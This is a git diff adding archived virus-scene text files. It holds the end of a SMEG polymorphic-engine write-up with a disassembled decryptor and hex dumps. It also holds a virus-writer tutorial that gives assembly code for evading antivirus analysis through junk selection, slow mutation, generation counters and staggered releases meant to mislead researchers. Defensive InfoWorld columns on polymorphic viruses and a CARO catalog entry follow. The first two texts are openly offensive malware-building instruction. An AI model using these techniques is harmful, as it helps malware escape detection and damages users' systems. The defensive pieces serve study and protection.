+0145    TEST    CL,[SI+3435]    ;junk
+0149    MOV     BP,2E08         ;junk
+014D    TEST    CX,DI           ;junk
+014F    CLD                     ;junk
+0150    MOV     SI,3831         ;junk
+0154    AND     BP,363E         ;junk
+0158    ROR     DI,CL           ;junk
+015A    CLC                     ;junk
+015B    JNS     0163            ;junk
+015D    SAR     SI,1            ;junk
+015F    SBB     DI,3308         ;junk
+0163    SBB     DI,362B         ;junk
+
+0167    MOV     AX,07DB         ;*  Set up the COUNT register
+
+016A    AND     DI,0F1E         ;junk
+016E    JMP     0182            ;junk
+0171    MOV     DI,2F31         ;junk
+0175    CMP     CX,2212         ;junk
+0179    SBB     SI,2E14         ;junk
+017D    TEST    BL,[SI+341D]    ;junk
+0181    RET                     ;junk
+0182    CMP     BH,19           ;junk
+
+0185    MOV     BX,B977         ;*  Set up the INDEX register
+
+0188    TEST    AL,[DI+072C]    ;junk
+018C    TEST    DI,2306         ;junk
+0190    SHR     SI,1            ;junk
+
+0192    MOV     DX,CS           ;*  Get CODE SEG in DX
+
+0194    CALL    0171            ;junk
+0197    TEST    SI,1410         ;junk
+019B    CLC                     ;junk
+019C    SHL     DI,CL           ;junk
+
+019E    MOV     DS,DX           ;*  Make DATA SEG = CODE SEG
+
+01A0    NEG     SI              ;junk
+01A2    CALL    0171            ;junk
+01A5    TEST    CH,[BP+DI+070F] ;junk
+
+01A9    MOV     DL,8D           ;*  Set decrypt KEY register
+
+01AB    MOV     DI,3A30         ;junk
+01AF    JMP     01B9            ;junk
+01B2    JBE     01B5            ;junk
+01B4    INC     DI              ;junk
+01B5    NOT     DI              ;junk
+01B7    CMC                     ;junk
+01B8    RET                     ;junk
+01B9    XOR     CX,DX           ;junk
+
+01BB    CALL    01B2            ;junk * Decryptor MAIN LOOP
+
+01BE    TEST    SI,3029         ;junk
+01C2    INC     DI              ;junk
+01C3    SBB     DI,1E19         ;junk
+01C7    MOV     DI,0038         ;junk
+01CB    RCR     DI,CL           ;junk
+01CD    MOV     BP,1809         ;junk
+
+01D1    NEG     BYTE PTR [BX+4969]      ;*  NEG the byte at [BX + 4969]
+                                        ;   NOTE:  original index B977h plus
+                                        ;   4969h = 102E0h AND FFFFh = 02E0h!
+                                        ;   Which is the start of the
+                                        ;   encrypted code!
+
+01D5    TEST    BP,2A37         ;junk
+01D9    CMP     CX,2B37         ;junk
+01DD    JMP     01E2            ;junk
+01E0    DEC     DI              ;junk
+01E1    RET                     ;junk
+
+01E2    MOV     CL,[BX+4969]    ;*  Get the NEGed byte into CL
+
+01E6    CMC                     ;junk
+01E7    ROR     DI,CL           ;junk
+01E9    INC     BP              ;junk
+01EA    TEST    DI,281E         ;junk
+01EE    JZ      01F3            ;junk
+01F0    TEST    BH,[BX+DI+05]   ;junk
+01F3    MOV     DI,160C         ;junk
+01F7    SUB     BP,BP           ;junk
+
+01F9    XOR     CX,DX           ;*  XOR byte with the KEY
+
+01FB    TEST    BL,[BP+DI+3C]   ;junk
+01FE    JNB     0204            ;junk
+0200    ADD     BP,0A13         ;junk
+0204    CMP     [BX+DI],CL      ;junk
+0206    CALL    01E0            ;junk
+0209    CALL    01E0            ;junk
+020C    DEC     DI              ;junk
+020D    AND     DI,073A         ;junk
+
+0211    DEC     AX              ;*  Decrease the COUNT register
+
+0212    XOR     DI,2036         ;junk
+0216    NEG     BP              ;junk
+0218    ADC     DI,SP           ;junk
+021A    CMC                     ;junk
+021B    CMP     BL,[BX+SI]      ;junk
+
+021D    DEC     DX              ;*  Decrease the KEY register
+
+021E    ADC     BP,1821         ;junk
+0222    SHL     DI,CL           ;junk
+0224    CMP     AX,1816         ;junk
+0228    SHL     DI,1            ;junk
+022A    CMP     AL,[BP+DI+1A]   ;junk
+022D    MOV     SI,1819         ;junk
+0231    ADD     SI,063B         ;junk
+
+0235    DEC     DX              ;*  Decrease the KEY register
+
+0236    SUB     BP,0028         ;junk
+023A    AND     BP,1930         ;junk
+023E    CLD                     ;junk
+023F    ADC     BP,2D1D         ;junk
+0243    SAR     DI,CL           ;junk
+
+0245    XCHG    CX,DX           ;*  Swap CX & DX
+
+0247    TEST    CX,DX           ;junk
+0249    MOV     SI,CX           ;junk
+024B    XOR     SI,030D         ;junk
+024F    SUB     DI,311C         ;junk
+
+0253    XCHG    DL,[BX+4969]    ;*  Swap [index] & DL
+                                ;   NOTE:  This restores the decrypted byte!
+
+0257    ADD     DI,0E13         ;junk
+025B    CMP     BL,[BP+DI+33]   ;junk
+025E    CLD                     ;junk
+025F    NOT     SI              ;junk
+0261    MOV     SI,3F1C         ;junk
+
+0265    XCHG    CX,DX           ;*  Swap CX & DX, restoring the KEY in DL
+
+0267    MOV     SI,221A         ;junk
+026B    OR      BP,0D2C         ;junk
+026F    MOV     DI,231B         ;junk
+
+0273    ADD     BX,0001         ;*  Increase the INDEX register
+
+0277    JMP     0288            ;junk
+027A    ADC     BP,AX           ;junk
+027C    TEST    BL,[DI+19]      ;junk
+027F    TEST    DI,0321         ;junk
+0283    NEG     DI              ;junk
+0285    ROL     SI,CL           ;junk
+0287    RET                     ;junk
+0288    SBB     BP,1B0D         ;junk
+028C    XOR     BP,2A23         ;junk
+0290    CMP     DL,3A           ;junk
+0293    TEST    BH,[DI]         ;junk
+
+0295    AND     AX,AX           ;*  Test if COUNT is zero
+0297    JNZ     02AD            ;*  Jump to 02ADh if not
+
+0299    CALL    027A            ;junk
+029C    AND     DI,291F         ;junk
+02A0    JA      02A6            ;junk
+02A2    MOV     DI,0514         ;junk
+02A6    ADC     SI,1F2A         ;junk
+
+02AA    JMP     02BC            ;*  Finished decrypting
+
+02AD    JMP     02B2            ;junk
+02B0    CLC                     ;junk
+02B1    RET                     ;junk
+02B2    SHL     DI,CL           ;junk
+02B4    CLD                     ;junk
+02B5    ADD     SI,2C1A         ;junk
+
+02B9    JMP     01BB            ;*  Jump to MAIN LOOP
+
+02BC    TEST    BH,BL           ;junk
+02BE    MOV     DI,210C         ;junk
+02C2    SUB     SI,1600         ;junk
+02C6    CALL    02B0            ;junk
+02C9    XOR     SI,2F1D         ;junk
+02CD    MOV     BP,0430         ;junk
+02D1    TEST    BH,[DI+362A]    ;junk
+02D5    OR      DI,1C21         ;junk
+02D9    STC                     ;junk
+02DA    CMP     DI,2828         ;junk
+02DE    CLC                     ;junk
+02DF    DEC     BP              ;junk
+
+02E0    The encrypted code starts here.
+
+;****************** End of decryptor 2 assembler listing. *******************
+
+
+The following are the HEX dumps for both of the above decryptors, decryptor 1
+is on the left and 2 is on the right.  These dumps are to show that it would
+be very difficult to find a signature that could be applied to each of these
+decryptors in the hope of detecting them both, this is the main purpose of a
+Polymorph Engine!  To detect, therefore, you would have to write a program
+that tries to use intelligence to work out if what it is looking at is a
+Polymorph generated decryptor.  This is prone to false alarms or, in certain
+cases, missing the decryptor totally!
+
+
+HEX DUMP OF ENCRYPTOR 1, 368 bytes        HEX DUMP OF ENCRYPTOR 2, 480 bytes
+����������������������������������        ����������������������������������
+ 7901FCD3FE81FD0807F97F020BF181F7          F7D6846B0F47FC81D72A137A0481CF2E
+ 213281C5050881E51235D3EEC7C6041B          334684C5E909007A0481FA0919D3DFC3
+ D3FF81D6062581D7111F1B2E3E0F81FD          4785FDE90D00F7C7240EF7C73A0923FC
+ 1E3F4EF7D781E63D084681DF0301BA91          383AC3C7C5280C84F5F7C5161CD3CD74
+ 17FC720285F01BFC853E1B25840CD1E5          04843703FC848C3534C7C5082E85CFFC
+ BB7D01F5C7C718127002D1DFF939FD8C          C7C6313881E53E36D3CFF87906D1FE81
+ C8846F1781DD073147D1DD8ED8033E04          DF083381DF2B36B8DB0781E71E0FE911
+ 3BB0507304C7C63914720213F8E90500          00C7C7312F81F9122281DE142E849C1D
+ C7C5361BC3D1DEBB2D842BF181CF0F0B          34C380FF19BB77B984852C07F7C70623
+ C7C53E1ED3D781ED122E033E2A2ED3C6          D1EE8CCAE8DAFFF7C61014F8D3E78EDA
+ 8A8F437E740684BD3B2B3812D1C781DF          F7DEE8CCFF84AB0F07B28DC7C7303AE9
+ 3A264AE8CAFF8BF981D52E282AC8C7C6          0700760147F7D7F5C333CAE8F4FFF7C6
+ 2A37F7C5103AE8B7FF81D61713FC4081          29304781DF191EC7C73800D3DFC7C509
+ F63D20E90B004FF52B2E243681F60002          18F69F6949F7C5372A81F9372BE90200
+ C3387C1381EA010081F8170581ED1628          4FC38A8F6949F5D3CF45F7C71E287403
+ 81E6070881EE032ED1CD47D3DE84EE81          847905C7C70C162BED33CA845B3C7304
+ ED2610888F437E730481F7301BFC81C6          81C5130A3809E8D7FFE8D4FF4F81E73A
+ 383C4381F72C0BE9150081CD181C7E01          074881F73620F7DD13FCF53A184A81D5
+ 4D81D6320E81E72215387A36D1C6C3D1          2118D3E781F81618D1E73A431AC7C619
+ E7D1EF4A7509840B81D52D01E91C0045          1881C63B064A81ED280081E53019FC81
+ 730481FB2E0E85FE81DE3332B98A01D1          D51D2DD3FF87CA85CA8BF181F60D0381
+ C72BFBD1EF84992E1C51C3C7C61F213A          EF1C318697694981C7130E3A5B33FCF7
+ 1981ED332DC7C5353733F68B2E380A47          D6C7C61C3F87CAC7C61A2281CD2C0DC7
+                                           C71B2381C30100E90E0013E8845D19F7
+                                           C72103F7DFD3C6C381DD0D1B81F5232A
+                                           80FA3A843D23C07514E8DEFF81E71F29
+                                           7704C7C7140581D62A1FE90F00E90200
+                                           F8C3D3E7FC81C61A2CE9FFFE84FBC7C7
+                                           0C2181EE0016E8E7FF81F61D2FC7C530
+                                           0484BD2A3681CF211CF981FF2828F84D
+
+Now read SMEG.TXT to see how to use SMEG.OBJ (SMEG v0.3) in your own viruses
+and programs!
+
+��� (C) The Black Baron ���
+
diff --git a/textfiles.com/virus/polymorph.txt b/textfiles.com/virus/polymorph.txt
new file mode 100644
index 00000000..a5310d4c
--- /dev/null
+++ b/textfiles.com/virus/polymorph.txt
@@ -0,0 +1,343 @@
+                     POST - DISCOVERY - STRATAGIES
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                              By Sepultura
+
+                   -USE-ANARCHY-TO-GET-WHAT-YOU-WANT-
+
+                              Introduction
+                              ~~~~~~~~~~~~
+
+        Most virii these days, take many Pre-Discovery precautions. This
+simply means that they take precautions to avoid discovery, assuming the
+virus has not already been discovered.  Common examples of Pre-Discovery
+Stratagies are  File Stealth,  Sector Stealth,  and MCB stealth (i.e any
+stealth).  These mechanisms are used to stop the virus being discovered,
+but once it has been discovered,  and is in the hands of the AV, they're
+essentially useless. It is only a matter of days (or even hours) until a
+suitable scan string or algorithm has been determined,  for inclusion in
+to there AV programs.
+
+        There is how ever, a solution: POST DISCOVERY STRATAGIES.  These
+are mechanisms  that instead of serving the  purpose of hiding the virus
+from detection, make the virus harder to analyse,  and hence determine a
+scan string or detection algorithm.  To be entirely honest, the previous
+statement is not completely correct - in order to take advantage of  any
+of these methods your virus can not have a scan string - without atleast
+polymorphism, Post Discovery Stratagies ARE USELESS.  This document will
+be divided in to three main sections:   Polymorphism
+                                        Anti-Bait Techniques
+                                        Anti-Debugger Techniques.
+
+        I have decided to do it in that particular order,  as it follows
+my master scheme,  which in my  opinion takes maximum advantage of  Post
+Discovery Stratagies, and which I will outline throughout this document.
+
+        I have supplied example code fragments throughout this document,
+several full programs in the Anti - Debugger section,  as well as a bait
+maker in the Anti-Bait section, so you can test your Anti-Bait routines.
+
+
+                              Polymorphism
+                              ~~~~~~~~~~~~
+
+                   -I-USED-THE-ENEMY-I-USED-ANARCHY-
+
+        This section  is not  intended to  tell you  what a  polymorphic
+engine is,  nor  will it tell you  how to code one.  If  you do not know
+either of these, you should read this when you do,  or alternatively you
+could read this,  and take the explained methods in to account  when you
+do code one.
+
+        The thing  you have  to remember  is that  the AV people need to
+devise an alogrithm that will detect near to 100% of their samples,  but
+at the same time, have only a small number of false positives. Your job,
+is ofcourse, to stop them from doing this.
+
+
+                         Polymorphism: The Obvious
+                         ~~~~~~~~~~~~~~~~~~~~~~~~~
+        One of the most obvious  things that would you help in your Post
+Discovery Stratagies, is to make the decryptors and junk as varied as is
+possible. This way, they cannot use an algorithm that traces through the
+code, and concludes that the file is not infected, as soon as an  opcode
+is encounted that can't be generated by your engine. What might not seem
+to obvious, is that although your engine should be able to CREATE a wide
+variety of junk instructions,  it should not USE a  wide variety of junk
+instructions in each decryptor.  This might seem strange,  but it can be
+very useful in delaying the AV's efforts.  This is because there are two
+methods that the AV will use to analyse your engine:
+
+       1. They will disassemble the virus and analyse the engine, to see
+       what it can generate in all possible cases.
+
+       2. They will infect 10s of thousands of bait files to see what it
+       generates in all possible cases.
+
+
+        The first of these can be countered by keeping the actual engine
+encrypted,  independently of the virus,  and then  keeping the decryptor
+protected  -  using the  methods outlined in  Section 3 (Anti - Debugger
+Techniques).
+
+        The  second  method can be  countered using the  techniques that
+will be discussed in this section (Polymorphism), and Section 2  (Anti -
+Bait Techniques).
+
+        By  using only a very small variety of the large number of  junk
+instructions  that your engine can generate,  when the AV people look at
+the sample bait files,  they will only see a small selection of the junk
+that your virus can really create. Because your polymorphic engine is so
+heavily encrypted / armoured, they will not have time to disassemble it,
+and will have to make their judgements based on the bait files. However,
+since the decryptors will only have  a limited selection of all possible
+cases,  they could easilly make the mistake of basing their algorithm on
+just those decryptors,  and release an incomplete algorithm.  Of  course
+they will not realise their mistake until it is to late.  Let us look at
+the following code as an example:
+
+------------------------------------------------------------------------
+;Please note that this is simply a code fragment.  junk? are supposed to
+;be sub-procedures that create different junk opcodes, while get_rand is
+;supposed  to  be  a sub-procedure  that returns a  random number  in AX
+;between 0 and AX. It is assumed that ES = DS = CS.
+
+choose_junk_routines:
+        mov     cx,5                    ;This code should be run only once,
+        mov     ax,0Ah                  ;when the virus installs it self TSR.
+        call    get_rand                ;It will select 5 out of 15 junk
+        add     ax,ax                   ;routines to call for the decryptors.
+        xchg    si,ax                   ;Because it is only run once, all
+        add     si,offset main_junk_tbl ;decryptors will only use those junk
+        mov     di,offset junk_tbl      ;routines 'til the system is rebooted
+        rep     movsw                   ;and the virus re-installed.
+
+        ...
+
+main_junk_tbl:                          ;This is a table, listing all
+        dw      offset junk0            ;possible junk routines.
+        dw      offset junk1
+        dw      offset junk2
+        dw      offset junk3
+        dw      offset junk4
+        dw      offset junk5
+        dw      offset junk6
+        dw      offset junk7
+        dw      offset junk8
+        dw      offset junk9
+        dw      offset junkA
+        dw      offset junkB
+        dw      offset junkC
+        dw      offset junkD
+        dw      offset junkE
+
+junk_tbl:                               ;This is a table, to store the 5 junk
+        dw      0,0,0,0,0               ;routines to actually be used.
+
+        ...
+
+put_junk:
+        mov     ax,4                    ;This routine when, called will
+        call    get_rand                ;generate 1 junk instruction.
+        add     ax,ax                   ;It will call 1 of the 5 routines
+        xchg    si,ax                   ;stored in junk_tbl.
+        lodsw
+        call    ax
+        ret
+------------------------------------------------------------------------
+
+        The above code fragment,  will ensure that all files infected in
+any 1 session, will only use 5 out of the 15 possible junk instructions.
+
+
+                       Polymorphism: Slow Mutation
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+        The above techniques work well,  but can be even more effective,
+when used in conjucntion  with slow mutation.  Slow  Mutation  basically
+means that instead of making certain descisions based on random numbers,
+you  make the  descisions based on  relatively static values.  The  most
+common values used for this, are from the date (i.e. the month or day of
+the  month).  For  example,  let  us imagine  that  the  sub - procedure
+'choose_junk_routines' in the previous example, was replaced with this:
+
+------------------------------------------------------------------------
+choose_junk_routines:
+        mov     ah,2a                   ;ah=2a/i21 (get system date)
+        int     21
+        mov     dl,0
+        xchg    dh,dl
+        xchg    dx,ax
+        cwd                             ;ax=month, dx=0
+        mov     cx,6
+        div     cx                      ;divide month by 6
+        xchg    dx,ax                   ;ax = remainder (i.e. 0 - 5)
+        add     ax,ax
+        xchg    si,ax
+        add     si,offset main_junk_tbl
+        mov     di,offset junk_tbl
+        mov     cx,5
+        rep     movsw
+------------------------------------------------------------------------
+
+        The advantage of using this method, is that the same set of five
+junk routines will be used for a ENTIRE MONTH. With the previous example
+if the AV was to make some bait files, and look at them,  and think that
+your virus only generated five different junk instructions, and then ran
+the bait maker again, another time,  after resetting the system,  he/she
+would get bait file with (probably) a different set of junk instructions
+in the decryptor. Because of this, he/she would probably catch on.  This
+is important to note, because they will have to make a set of bait files
+to devise the algorithm,  and then at least  another set to test it.  If
+you based the 5 instructions on the month, and armoured the choose_junk_
+routines procedure, then they would get the same 5 instructions, because
+they would be all produced in the same month, and would not easily catch
+on.  Other things you should base upon  slow mutation techniques include
+things such as what registers to use,  the looping method,  the encrypt/
+decrypt method, and the length of the decryptor. This way,  they have to
+reboot the computer each time,  and set a new date,  to see all possible
+combinations. Consisdering there are thousands of  bait file to be made,
+this also means that there are thousands of resets to be done!
+
+        Another thing you could base slow mutation descisions on,  is  a
+generation counter.  This is very effective,  because if the AV runs  an
+infected file,  and then because the virus is  TSR  in memory,  runs the
+bait creator, to create some infected samples, all the infected samples,
+will be of the same generation.  Even if the AV people think of changing
+the date, the fact that the virus changes some aspects of itself on each
+generation, will not be so obvious. This is especially true if the virus
+makes the changes on,  say every fourth generation,  instead of each and
+every generation. For example:
+
+------------------------------------------------------------------------
+
+        inc     cs:word ptr generation  ;This should be run once,
+                                        ;at installation.
+
+        ...
+
+;This sub-procedure will choose what method to use to decrement the
+;count register. It will choose one of the 8 possible procedures to
+;call from the "decrement_tbl" table. Instead of choosing a method at
+;random, it divdes the generation by 8, and then takes the modulos of
+;(GENERATION / 8) / 8, to choose which procedure to use. In short, the
+;decrement method will only change every 8th generation. The AV do not
+;spend enough time to see all possible methods, as they would have to
+;look at 64 different generations. They will most likely look at only
+;one or two.
+
+choose_decrement_method:
+        mov     ax,0
+generation      equ     $-2             ;Generation counter starts at 0
+
+        shr     ax,3                    ;Divide Generation count by 8
+        and     ax,7                    ;get number between 0 and 7
+        add     ax,ax
+        xchg    si,ax
+        add     si,offset decrement_tbl
+        lodsw
+        call    ax
+        ret
+
+        ...
+
+decrement_tbl:                          ;this is supposed to be a table of
+        dw      offset code_dec_reg     ;all the possible procedures you can
+        dw      offset code_sub_reg_1   ;use to decrement the count register.
+        dw      offset code_add_reg_negative_1
+        dw      offset code_clc_sbb_reg_1
+        dw      offset code_stc_sbb_reg_0
+        dw      offset code_clc_adc_reg_negative_1
+        dw      offset code_stc_adc_reg_negative_2
+        dw      offset code_inc_dec_dec_reg
+------------------------------------------------------------------------
+
+        Of course,  you do not have to base  something as trivial as the
+method of decrement on the  generation counter,  and could  instead base
+something more important like the actual method of decryption on it.
+
+        Also,  if you wanted to be really sly  (and I know you do),  you
+could use the above method, but then release the virus in the wild, with
+its generation counter set to something like 16.  This way,  no one will
+see the first 2 methods,  until the generation counter has carried over.
+About a week after releasing it, you could release it somewhere else, so
+that the AV people will get the first specimen, and their algorithm will
+be missing the first two methods, while the second infection you release
+can have the counter  set to 0,  so that the decryptors  using the first
+two methods will be in the wild,  and will spread, before the AV realise
+their mistake.
+
+        Another thing you could base your slow poly on,  is the file you
+are infecting.  For example,  let us imagine you based the above example
+on the SIZE of the file to be infected, divided by 1000, rather then the
+GENERATION divided by 8.  Since the bait files  will be of  the same  or
+similar size, little to no change will be seen. If a different file of a
+different size was infected however,  you would have a totally different
+decryptor!
+
+
+                Polymorphism: Make No Two Conditions Dependant
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+        One of the biggest mistakes you could make when coding an engine
+is making two conditions dependant on the same thing. For example let us
+imagine that you made both the  index register used,  and the decryption
+method used  dependant on the month. This could possibly mean, that when
+XOR encryption is used, you can guarantee BX is the index register,  and
+when ADD is used SI will be the index register. This way,  all they have
+to do is check for a  XOR [SI],?? instruction or a ADD [BX],??.  If  you
+made this mistake,  and had four index registers,  and  four  decryption
+methods,  the scanner need only to check for four possible instructions.
+However,  if these were decided  on totally  independant criteria,  they
+would have to check for 16 different instructions, increasing the chance
+of false positives. For another example, let us look at the following:
+------------------------------------------------------------------------
+
+code_jmp:       mov     ax,3f           ;this code will generate a random
+                call    get_rand        ;conditional jump, to a random offset
+                mov     ah,al           ;between 0 adn 3f bytes from the
+                or      al,70           ;jump. Note that the conditional
+                stosw                   ;jumps are 70h -> 7fh.
+------------------------------------------------------------------------
+
+        The above example will always generate,  a working,  conditional
+jump. It does however have a fairly obvious flaw.  If the jump opcode is
+70h then the offset of the jump will be 0, 10h, 20h, or 30h. If the jump
+opcode is 70h then the offset of the jump will be 1, 11h,  21h,  or 31h.
+This will remain true for all of 70h to 7fh. This is very dangerous,  as
+a scanner could something like this in its algorithm:
+------------------------------------------------------------------------
+
+;This code fragment, is assumed to be part of a scanner that is tracing
+;through the code it scans. It is assumed that DS:SI points to the current
+;instruction being processed.
+
+                lodsw
+                cmp     al,70
+                jb      not_cond_jmp
+                cmp     al,7f           ;checks if we are dealing with a
+                ja      not_cond_jmp    ;conditional jump.
+
+                and     ax,0f0f         ;If the jump was generated with the
+                cmp     al,ah           ;above example, AL will always = AH.
+                jne     file_not_infected
+
+not_cond_jmp:   <DO THE NEXT CHECK>
+------------------------------------------------------------------------
+
+        As you can see,  if many things are dependant on each other,  an
+algorithm could be used that uses techniques like the above,  and if all
+rules are followed, safely assume the file was infected.  To  avoid  the
+above check, the conditional jump coder should be something like this:
+------------------------------------------------------------------------
+
+                mov     ax,3f
+                call    get_rand
+                mov     bl,al
+                mov     al,0f
+                call    get_rand
+                or      al,70
+                mov     ah,bl
+                stosw
+------------------------------------------------------------------------
+
+        As you can see, in the above example, the  offset of the jump is
+totally independant of the jumps opcode.  This will  make the  detection
+algorithm alot harder to devise.
diff --git a/textfiles.com/virus/polymrph.txt b/textfiles.com/virus/polymrph.txt
new file mode 100644
index 00000000..71683982
--- /dev/null
+++ b/textfiles.com/virus/polymrph.txt
@@ -0,0 +1,249 @@
+   Polymorphic viruses escape detection but get our attention
+
+  Last week, we faced the implications of the next-generation
+ultrastealth viruses that are now reproducing themselves among us. 
+Because a few of these viruses have already been found to be
+employing this new scanner-beating self-modifying technology and
+because their is nothing particularly difficult about writing such
+a polymorphic virus, I feel there is more good than harm in a
+public discussion of this nasty new breed.
+ (I know that many readers are wondering what happened to my
+promised solution to the spread of these viruses; it will come next
+week after I illustrate the danger of these new germs.)
+ viruses can be detested by recognizing either their dynamic
+actions or their static presence. Dynamic-action recognition
+provides the potential benefit of stopping unknown viruses.
+Nevertheless, today's smarter viruses can circumvent such
+interception easily. If the virus wishes to have a higher level of
+software access to the system, several techniques are known for
+getting underneath DOS and BIOS interception, so resident blockers
+are all but useless.
+ Static-presence recognition scans the entire system for the
+"fingerprints" of known viruses. Today's deliberately elusive
+polymorphic viruses can evade this detection entirely.
+ The simple idea behind the polymorphic virus is that the bulk of
+the virus can be scrambled by a random number. Every IBM-compatible
+PC has a counter/timer chip that can be used as the source for a
+completely nondeterministic 16-bit random number. When the virus
+clones itself into a new environment, it can use the instantaneous
+value of the counter/timer as a scrambling starting point. By
+algorithmically altering every byte of itself based upon this
+initial number, the newly propagated virus will be immune to
+fingerprint detection.
+ There's one flaw in this approach: The small kernel of code used
+to unscramble the body of the virus must be left in an unscrambled
+state so the computer can execute it and unscramble the balance of
+the virus. This means the unscrambling portion could still be
+fingerprinted and identified.
+ This problem could be easily solved: By deliberately interlacing
+irrelevant "do nothing" instructions among those that perform the
+unscrambling work, every stored instance of the unscrambling kernel
+could be completely different from all the others. As the virus
+copies itself to a new destination, it randomly draws from a
+repertory of superfluous instructions, peppering them liberally
+throughout the new copy of itself.
+ As you can see, these techniques can be teamed up with activity
+interception avoidance to create a new breed of viruses that would
+be virtually impossible to detect.
+ It is quite annoying that we must expend our resources in the
+prevention of this software terrorism. But there may be some value
+in experiencing this terrorism now. Most viruses have been the work
+of amateurs and are far from devastating.
+ Being told on Friday the 13th that your computer is "stoned" is
+annoying as hell, and having to type "Happy Birthday to Joshi"
+early in January makes you wonder who's in charge. But it sure
+beats being informed that your company's customer list and the
+archived source code for your next unreleased product have just
+been transmitted by modem to your competition. When your network's
+database and modem servers receive remote procedure calls (RPCs)
+from remote workstations, are you sure they should answer that
+call?
+ We need to begin tightening up our systems and taking security
+very seriously. Personal computing is not just a diversion from the
+tedium of sharpening pencils; it is a serious endeavor that is
+extremely prone to organized and deliberate attack. If a bored,
+pimply faced highschool kid is capable of penetrating your
+corporation's security with his annoying but benign virus, you had
+better hope he never wants to hurt you.
+
+ Steve Gibson is the developer and publisher of SpinRite and
+president of Gibson Research Corp., based in Irvine California.
+       From April 20,1992 issue of InfoWorld\ 
+    At last, how to protect yourself from polymorphic viruses
+
+ My past two columns concerning the threat presented by polymorphic
+viruses triggered an informative conversation with the industry's
+chief virus researcher, John McAfee. During that conversation I
+learned that things are even worse than I'd supposed.
+ It turns out that the " Dark Avenger" bulletin board system, which
+disseminates virus code, has recently published the complete source
+code for the Dark Avenger Mutation engine. The mutation engine is
+nothing less than a first-class code kernel that can be tacked on
+to any existing or future virus to turn it into a nearly impossible
+to detect self-encrypting polymorphic virus.
+ My examination of a sample virus encrypted by the Mutation Engine
+provided by McAfee revealed alarming capabilities. Not only do Dark
+Avenger Mutation Engine viruses employ all of the capabilities I
+outlined in last week's theoretical polymorphic virus column, but
+they also use a sophisticated reversible encryption algorithm
+generator.
+ The Mutation Engine uses a metalanguage-driven algorithm generator
+that allows it to create an infinite variety of completely original
+encryption algorithms. The resulting unique algorithms are then
+salted with superflous instructions, resulting in decryption
+algorithms varying from 5 to 200 bytes long.
+ Because McAfee has already received many otherwise known viruses
+that are now encapsulated with the Mutation Engine's polymorphic
+encryption, it's clear that viruses of this new breed are now
+traveling among us.
+ It is clear that the game is forever changed; the sophistication
+of the Mutating Engine is amazing and staggering. Simple pattern-
+matching virus scanners will still reliably detect the several
+thousand well-known viruses; however these scanners are completely
+incapable of detecting any of the growing number of viruses now
+being cloaked by the Dark Avenger Mutation Engine.
+ So what can we ultimately do to twart current and future software
+viruses? After brainstorming through the problem with some of our
+industry's brightest developers and systems architects, I've
+reached several conclusions:
+ First, scanning for known viruses within executable program code
+is fundamentally a dead end. It's the only solution we have for the
+moment, but the detectors can only find the viruses they are aware
+of, and new developments such as the Mutation Engine render even
+these measures obsolete.
+ Second, detecting the reproductive proclivities of viruses on the
+prowl is prone to frequent false alarms and ultimately complete
+avoidance. With time the viruses will simply circumvent the
+detectors, at which time the detectors will only misfire for self-
+modifying benign programs.
+ Third, the Achilles' heel of our current DOS-based PC is its
+entirely unprotected nature. As long as executable programs( such
+as benign and helpful system utilities) are able to freely and
+directly access and alter the operating system and its file system,
+our machines will be vulnerable to deliberate viral attack.
+ So here's my recommendation.
+ Only a next-generation protected mode operating system can enforce
+the levels of security required to provide complete viral immunity.
+By marking files and code overlays as "read and execute only" and
+by prohibiting the sorts of direct file system tampering performed
+by our current crop of system utilities, such operating systems
+will be able to provide their client programs with complete viral
+immunity.
+ The final Achilles' heel of a protected-mode operating system is
+the system boot process, before and during which it is still
+potentially vulnerable. By changing the system ROM-BIOS' boot
+priorty to favor hard disc booting over floppy, thios last viral
+path can be closed and blocked as well.
+
+  note; Steve Gibson is the developer and publisher of SpinRite and
+president of Gibson Research Corp., based in Irvine, Calif. Send
+comments to InfoWorld via MCImail (259-2147) or fax them to (415)
+358-1269
+Subject:  Polymorphic Virus
+
+Here is a new entry from the Computer Virus Catalog, produced and 
+distributed by the Computer Anti-Virus Researcher's Organization (CARO),
+at the University of Hamburg.
+  
+Note the description of the Polymorphic Method, below, and that this
+virus can presently be detected in a file only by the file change it
+produces.
+
+
+==== Computer Virus Catalog 1.2: Dedicated Virus (31-January 1992) ===
+Entry...............: Dedicated Virus
+Alias(es)...........: ---
+Virus Strain........: ---
+Polymorphism engine.: Mutating Engine (ME) 0.9
+Virus detected when.: UK
+              where.: January 1992
+Classification......: Polymorphic encrypted program (COM) infector, 
+                         non-resident
+Length of Virus.....: 3,5 kByte (including Mutating Engine)
+--------------------- Preconditions ----------------------------------
+Operating System(s).: MS-DOS
+Version/Release.....: 2.xx upward
+Computer model(s)...: IBM - PCs, XT, AT, upward and compatibles
+--------------------- Attributes -------------------------------------
+Easy Identification.: COM file growth (no other direct detection means
+                         are known as virus encrypts itself, and due 
+                         to the installed mutation engine, all occu-
+                         rences of this virus differ widely)
+Type of infection...: COM file infector: all COM files in current 
+                         directory on current drive (disk,diskette)
+                         are infected upon executing an infected file.
+Infection Trigger...: Execution of an infected COM file.
+Media affected......: Hard disk, any floppy disk
+Interrupts hooked...: ---
+Crypto method.....: The virus encrypts itself upon infecting a COM 
+                         file using its own encryption routine; upon
+                         execution, the virus decrypts itself using
+                         its own small algorithm. 
+Polymorphic method..: After decryption, the virus' envelope consisting
+                         of Mutating Engine 0.9 will widely vary the
+                         virus' coding before newly infecting another
+                         COM file. Due to this method, common pieces 
+                         of code of more than three bytes (=signatures)
+                         of any two instances of this virus are highly
+                         improbable. 
+                      Remark: Mutating Engine 0.9 very probably was
+                         developed by the Bulgarian virus writer 
+                         "Dark Avenger"; such a program was announced
+                         early 1991 as permutating more than 4 billion
+                         times, and it appeared in October 1991 or 
+                         before.
+                         The class of permutating viruses is named 
+                         "polymorphic" to indicate the changing 
+                         structure which may not be identified with 
+                         contemporary means. To indicate the relation
+                         to such common engine, the term "Polymorhic 
+                         engine (method)" has been introduced.
+                         ME 0.9 was distributed via several Virus 
+                         Exchange Bulletin Boards, so it is possible 
+                         that other ME 0.9 related viruses appear. 
+                         According to (non-validated) information, an-
+                         other ME 0.9 based virus (Pogue?) has been
+                         detected in North America: COM file infector,
+                         memory resident, length about 3,7 kBytes.
+Damage..............: Virus overwrites at random times random sectors
+                         (one at a time) with garbage (INT 26 used).
+Damage Trigger......: Random time
+Similarities........: ---
